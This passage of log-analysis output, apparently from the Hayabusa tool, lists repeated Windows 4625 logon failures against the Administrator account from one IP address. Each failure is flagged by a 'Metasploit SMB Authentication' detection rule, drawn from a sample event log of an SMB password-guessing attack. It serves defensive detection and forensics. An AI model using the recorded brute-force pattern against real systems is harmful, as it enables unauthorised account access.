Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KxA2dh1iUMaMWOkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sCzEzW8jDZGGZcpd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p8510u5OsCVd94I5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2a0whHngnv7o1Bz2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xy6cGuYgubjlXoMw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luoXLN2XZQC0lHfu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8jdKLW96haKCHHXI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9SQSH6E1aKXu1o7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nOUdKa838wK1mLFw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aFmILxspIJsiEHwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCz7qbdSEyqxQSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny3F1xPgakJK0CA7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi7Moaa6d12CzWhl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fbbRVOig9bn9p5g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qSZrfRe9d0LLkbmA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QqdZMYsbXFlrKFxk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kypdxj88trEUBEny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9hM8fge1IrNsJNd2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SzG27JSj6iAFyiNT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hWcjuW8dU5ATLHzB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ns9lm9Nvhvi4fY6A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aExdYPqY2eUCYZmC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t9cnmRGdByuJlKZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f9RvWTFFUgCrhlkD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HC3oQUIEWqztyx6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TK3BOeD2w9xPB4N1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6yzU5WuvpmPKLSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GFoUGsara5Pl03WP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLaOCImeMIMlGvMj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Vzb3pEI2ZeP2NFA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Fa7ebH7UXd1KW4X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wRBHXRkOa6x5KI5G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VNVxzgOLrZzfP3cB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yCNXajRX2lIgLQuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x0nukf24IoalycOn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZFZN0KfeHtyDppG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmxqKyWU5GU1y22P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuRyvCfgQ4rwG3fu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3prKZt5ymouwNKnK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CWrNNn13EC1FLwLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SfnBT5OvT5cQXHfS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLZFPCShXoPvvThS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UsPCJ0UlfH4urYrm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIQlOetFByLZqPkT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9IBZ0qTDlHWADZt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lmhkB39gKvvuT89e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4KPoZ8JB7WSjUCHW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 